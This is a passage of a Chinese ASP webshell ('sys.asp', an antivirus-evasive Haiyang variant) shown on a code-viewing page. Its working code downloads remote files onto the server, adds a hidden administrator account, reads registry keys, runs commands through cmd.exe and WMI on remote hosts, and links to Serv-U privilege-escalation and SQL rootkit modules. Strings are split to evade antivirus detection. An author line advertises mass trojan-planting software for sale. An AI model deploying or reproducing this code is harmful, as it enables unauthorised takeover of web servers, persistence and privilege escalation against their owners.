📄 sys.asp
字号:
Case "addUser"
AddUser Request("userName"), Request("passWord")
Response.End
Case "readReg"
readReg()
Response.End
End Select
echo "数制转换:<hr/>"
echo "<input name=text1 value=字符和数字转10和16进制 size=25 id=text9>"
echo "<input type=button onclick=main(); value=给我转>"
echo "<input value=16进制转10进制和字符 size=25 id=vars>"
echo "<input type=button onClick=main2(); value=给我转>"
echo "<hr/>"
echo "下载到服务器:<hr/>"
echo "<form method=post target=_blank>"
echo "<input name=theUrl value='http://' size=80><input type=submit value=' 下载 '><br/>"
echo "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
echo "<input type=checkbox name=overWrite value=2>存在覆盖"
echo "<input type=hidden value=downFromUrl name=theAct>"
echo "</form>"
echo "<hr/>"
echo "文件编辑:<hr/>"
echo "<form method=post action='?' target=_blank>"
echo "<input size=80 name=thePath value=""" & HtmlEncode(Request.ServerVariables("PATH_TRANmeihuaATED")) & """>"
echo "<input type=hidden value=showEdit name=theAct>"
echo "<select name=meihua><option value=AppFileExplorer>用Stream</option><option value=FsoFileExplorer>用FSO</option></select>"
echo "<input type=submit value=' 打开 '>"
echo "</form><hr/>"
echo "管理帐号添加(成功率极低):<hr/>"
echo "<form method=post target=_blank>"
echo "<input type=hidden value=addUser name=theAct>"
echo "<input name=userName value='meihuaTop' size=39>"
echo "<input name=passWord type=password value='meihuaTop' size=39>"
echo "<input type=submit value=' 添加 '>"
echo "</form><hr/>"
echo "注册表键值读取(<a href=javascript:showHideMe(regeditInfo);>资料</a>):<hr/>"
echo "<form method=post target=_blank>"
echo "<input type=hidden value=readReg name=theAct>"
echo "<input name=thePath value='HKLM\SYSTEM\CurrentControlSet\Control\banputerName\banputerName\banputerName' size=80>"
echo "<input type=submit value=' 读取 '>"
echo "<span id=regeditInfo style='display:none;'><hr/>"
echo "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-DisplayLastUserName,REG_SZ,1 {不显示上次登录用户}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机IPC$共享}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer,REG_DWORD,0 {禁止默认共享}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableSharedbanDrives,REG_SZ,0 {关闭网络共享}<br/>"
echo "HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters,REG_DWORD,1 {启用TCP/IP筛选(所有试配器)}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 {允许IP路由}<br/>"
echo "-------以下似乎要看绑定的网卡,不知道是否准确---------<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway,REG_MUTI_SZ {默认网关}<br/>"
echo "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\NameServer {首DNS}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts {允许的TCP/IP端口}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts {允许的UDP端口}<br/>"
echo "-----------OVER--------------------<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {共几块活动网卡}<br/>"
echo "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {当前网卡的序列(把上面的替换)}<br/>"
echo "==========================================================<br/>以上资料由kEvin1986提供"
echo "</span>"
echo "</form><hr/>"
echo "<script language=vbs>" & vbNewLine
echo "sub main()" & vbNewLine
echo "base=document.all.text9.value" & vbNewLine
echo "If IsNumeric(base) Then" & vbNewLine
echo "cc=hex(cstr(base))" & vbNewLine
echo "alert(""10进制为""&base)" & vbNewLine
echo "alert(""16进制为""&cc)" & vbNewLine
echo "exit sub" & vbNewLine
echo "end if" & vbNewLine
echo "aa=asc(cstr(base))" & vbNewLine
echo "bb=hex(aa)" & vbNewLine
echo "alert(""10进制为""&aa)" & vbNewLine
echo "alert(""16进制为""&bb)" & vbNewLine
echo "end sub" & vbNewLine
echo "sub main2()" & vbNewLine
echo "If document.all.vars.value<>"""" Then" & vbNewLine
echo "Dim nums,tmp,tmpstr,i" & vbNewLine
echo "nums=document.all.vars.value" & vbNewLine
echo "nums_len=Len(nums)" & vbNewLine
echo "For i=1 To nums_len" & vbNewLine
echo "tmp=Mid(nums,i,1)" & vbNewLine
echo "If IsNumeric(tmp) Then" & vbNewLine
echo "tmp=tmp * 16 * (16^(nums_len-i-1))" & vbNewLine
echo "Else" & vbNewLine
echo "If ASC(UCase(tmp))<65 Or ASC(UCase(tmp))>70 Then" & vbNewLine
echo "alert(""你输入的数值中有非法字符,16进制数只包括1~9及a~f之间的字符,请重新输入。"")" & vbNewLine
echo "exit sub" & vbNewLine
echo "End If" & vbNewLine
echo "tmp=(ASC(UCase(tmp))-55) * (16^(nums_len-i))" & vbNewLine
echo "End If" & vbNewLine
echo "tmpstr=tmpstr+tmp" & vbNewLine
echo "Next" & vbNewLine
echo "alert(""转换的10进制为:""&tmpstr&""其字符值为:""&chr(tmpstr))" & vbNewLine
echo "End If" & vbNewLine
echo "end sub" & vbNewLine
echo "</script>" & vbNewLine
echo ""
End Sub
Sub downFromUrl()
If isDebugMode = False Then
On Error Resume Next
End If
Dim Http, theUrl, thePath, stream, fileName, overWrite
theUrl = Request("theUrl")
thePath = Request("thePath")
overWrite = Request("overWrite")
Set stream = Server.CreateObject("Adodb.Stream")
Set Http = Server.CreateObject("MSXML2.XMLHTTP")
If overWrite <> 2 Then
overWrite = 1
End If
Http.Open "GET", theUrl, False
Http.Send()
If Http.ReadyState <> 4 Then
Exit Sub
End If
With stream
.Type = 1
.Mode = 3
.Open
.Write Http.ResponseBody
.Position = 0
.SaveToFile thePath, overWrite
If Err.Number = 3004 Then
Err.Clear
fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
If fileName = "" Then
fileName = "index.htm.txt"
End If
thePath = thePath & "\" & fileName
.SaveToFile thePath, overWrite
End If
.Close
End With
chkErr(Err)
alertThenClose("文件 " & Replace(thePath, "\", "\\") & " 下载成功!")
Set Http = Nothing
Set Stream = Nothing
End Sub
Sub AddUser(strUser, strPassword)
If isDebugMode = False Then
On Error Resume Next
End If
Dim banputer, theUser, theGroup
Set banputer = Getobject("WinNT://.")
Set theGroup = GetObject("WinNT://./Administrators,group")
Set theUser = banputer.Create("User", strUser)
theUser.SetPassword(strPassword)
chkErr(Err)
theUser.SetInfo
chkErr(Err)
theGroup.Add theUser
chkErr(Err)
Set theUser = Nothing
Set banputer = Nothing
Set theGroup = Nothing
echo getUserInfo(strUser)
End Sub
Sub readReg()
If isDebugMode = False Then
On Error Resume Next
End If
Dim i, thePath, theArray
thePath = Request("thePath")
' echo thePath & "<br/>"
theArray = wsX.RegRead(thePath)
If IsArray(theArray) Then
For i = 0 To UBound(theArray)
echo "<li>" & theArray(i)
Next
Else
echo "<li>" & theArray
End If
chkErr(Err)
End Sub
Sub myban()
echo "<form name=""form1"" method=""post"" action=""?meihua=myban"">"
echo " 远程执行命令"
echo "<input name=""ok"" type=""text"" id=""ok"" value="""192.168.2.1","root/cimv2","administrator","xiaolu""" size=""70"">"
echo " <input type=""submit"" name=""Submit"" value=""提交"">"
echo "</form>"
if request("ok")<>"" then
set ww=server.createobject("wbemscripting.swbemlocator")
set cc=ww.connectserver(request("ok"))
set ss=cc.get("Win32_ProcessStartup")
Set oC=ss.SpawnInstance_
oC.ShowWindow=12
Set pp=cc.get("Win32_Process")
Response.Write pp.create("ban user",null,oC,intProcessID)
Response.Write "<br>"&intProcessID
Response.end
end if
end sub
Sub PageList()
showTitle("功能模块列表")
echo "<base target=_blank>"
echo "海洋免杀增强美化版<hr/>"
echo "<ol><li><a href='?meihua=ServiceList'>系统服务信息</a></li>"
echo "<br/>"
echo "<li><a href='?meihua=infoAboutSrv'>服务器相关数据</a><br/>("
echo "<a href='?meihua=infoAboutSrv&theAct=getSrvInfo'>系统参数</a>,"
echo "<a href='?meihua=infoAboutSrv&theAct=getSrvDrvInfo'>系统磁盘</a>,"
echo "<a href='?meihua=infoAboutSrv&theAct=getSiteRootInfo'>站点文件夹</a>,"
echo "<a href='?meihua=infoAboutSrv&theAct=getTerminalInfo'>终端端口&自动登录</a>)</li>"
echo "<li><a href='?meihua=objOnSrv'>服务器组件探针</a></li>"
echo "<li><a href='?meihua=userList'>系统用户及用户组信息</a></li>"
echo "<li><a href='?meihua=CSInfo'>客户端服务器交互信息</a></li>"
echo "<li><a href='?meihua=WsCmdRun'>WScri"&T&"pt.She"&T&"ll程序运行器</a></li>"
echo "<li><a href='?meihua=SaCmdRun'>She"&T&"ll.Appl"&T&"ication程序运行器</a></li>"
echo "<li><a href='?meihua=FsoFileExplorer'>FSO文件浏览操作器</a></li>"
echo "<li><a href='?meihua=AppFileExplorer'>She"&T&"ll.Appl"&T&"ication文件浏览操作器</a></li>"
echo "<li><a href='?meihua=MsDataBase'>微软数据库查看/操作器</a></li>"
echo "<li><a href='?meihua=PageAddToMdb'>文件夹打包/解开器</a></li>"
echo "<li><a href='?meihua=TxtSearcher'>文本文件搜索器</a></li>"
echo "<li><a href='?meihua=OtherTools'>一些零碎的小东西</a></li>"
echo "<li><a href='?ado=newado'>Ado Exploit</a></li>"
echo "<li><a href='?sql=yes'>SqlRootKit 3.0</a></li>"
echo "<li><a href='?meihua=myban'>wmi远程执行命令</a></li>"
echo "<li><a href='?su=su'>SerV-U-ASP提权</a></li>"
echo "<li><a href='?kill=yes'>干掉非本人ASP木马</a></li>"
echo "</ol>"
echo "BY :MORFI! 本人出售批量挂马ASP程序,可以测试的!要的联系QQ:660083<hr/>"
End Sub
Sub PageSaCmdRun()
If isDebugMode = False Then
On Error Resume Next
End If
Dim theFile, thePath, theAct, appPath, appName, appArgs
showTitle("She"&T&"ll.Appl"&T&"ication命令行操作")
theAct = Trim(Request("theAct"))
appPath = Trim(Request("appPath"))
thePath = Trim(Request("thePath"))
appName = Trim(Request("appName"))
appArgs = Trim(Request("appArgs"))
If theAct = "doAct" Then
If appName = "" Then
appName = "cmd.exe"
End If
If appPath <> "" And Right(appPath, 1) <> "\" Then
appPath = appPath & "\"
End If
If LCase(appName) = "cmd.exe" And appArgs <> "" Then
If LCase(Left(appArgs, 2)) <> "/c" Then
appArgs = "/c " & appArgs
End If
Else
If LCase(appName) = "cmd.exe" And appArgs = "" Then
appArgs = "/c "
End If
End If
saX.ShellExecute appName, appArgs, appPath, "", 0
chkErr(Err)
End If
If theAct = "readResult" Then
Err.Clear
echo encode(streamLoadFromFile(aspPath))
If Err Then
Set theFile = fsoX.OpenTextFile(aspPath)
echo encode(theFile.ReadAll())
Set theFile = Nothing
End If
Response.End
End If
echo "<style>body{margin:8;border:none;background-color:#0099FF;}</style>"
echo "<body onload=""document.forms[0].appArgs.focus();setTimeout('wmeihuaoadIFrame();', 3900);"">"
echo "<form method=post onSubmit='this.Submit.disabled=true'>"
echo "<input type=hidden name=theAct value=doAct>"
echo "<input type=hidden name=aspPath value=""" & HtmlEncode(aspPath) & """>"
echo "所在路径: <input name=appPath type=text id=appPath value=""" & HtmlEncode(appPath) & """ size=62><br/>"
echo "程序文件: <input name=appName type=text id=appName value=""" & HtmlEncode(appName) & """ size=62> "
echo "<input type=button name=Submit4 value=' 回显 ' onClick=""this.form.appArgs.value+=' > '+this.form.aspPath.value;""><br/> "
echo "命令参数: <input name=appArgs type=text id=appArgs value=""" & HtmlEncode(appArgs) & """ size=62> "
echo "<input type=submit name=Submit value=' 运行 '><br/>"
echo "<hr/>注: 只有命令行程序在CMD.EXE运行环境下才可以进行临时文件回显(利用"">""符号),其它程序只能执行不能回显.<br/>"
echo " 由于命令执行时间同网页刷新时间不同步,所以有些执行时间长的程序结果需要手动刷新下面的iframe才能得到.回显后记得删除临时文件.<hr/>"
echo "<iframe id=cmdResult style='width:100%;height:78%;'>"
echo "</iframe>"
echo "</form>"
echo "</body>"
End Sub
Sub PageServiceList()
Dim sa, objService, objbanputer
showTitle("系统服务信息查看")
Set objbanputer = GetObject("WinNT://.")
Set sa = Server.CreateObject("She"&T&"ll.Appl"&T&"ication")
objbanputer.Filter = Array("Service")
echo "<ol>"
If isDebugMode = False Then
On Error Resume Next
End If
For Each objService In objbanputer
echo "<li>" & objService.Name & "</li><hr/>"
echo "<ol>服务名称: " & objService.Name & "<br/>"
echo "显示名称: " & objService.DisplayName & "<br/>"
echo "启动类型: " & getStartType(objService.StartType) & "<br/>"
echo "运行状态: " & sa.IsServiceRunning(objService.Name) & "<br/>"
' echo "当前状态: " & objService.Status & "<br/>"
' echo "服务类型: " & objService.ServiceType & "<br/>"
echo "登录身份: " & objService.ServiceAccountName & "<br/>"
echo "服务描述: " & getServiceDsc(objService.Name) & "<br/>"
echo "文件路径及参数: " & objService.Path
echo "</ol><hr/>"
Next
echo "</ol><hr/>"
Set sa = Nothing
End Sub
Function getServiceDsc(strService)
Dim ws
Set ws = Server.CreateObject("WScr"&x&"ipt.Shell")
getServiceDsc = ws.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\" & strService & "\Description")
Set ws = Nothing
End Function
Sub PageTxtSearcher()
Response.Buffer = True
Server.ScriptTimeOut = 5000
Dim keyword, theAct, thePath, theFolder
theAct = Request("theAct")
keyword = Trim(Request("keyword"))
thePath = Trim(Request("thePath"))
showTitle("文本文件搜索器")
If thePath = "" Then
thePath = Server.MapPath("\")
End If
echo "FSO文件搜索:"
echo "<hr/>"
echo "<form name=form1 method=post action=?meihua=TxtSearcher&theAct=fsoSearch onsubmit=this.Submit.disabled=true>"
echo "路径: <input name=thePath type=text value=""" & HtmlEncode(thePath) & """⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -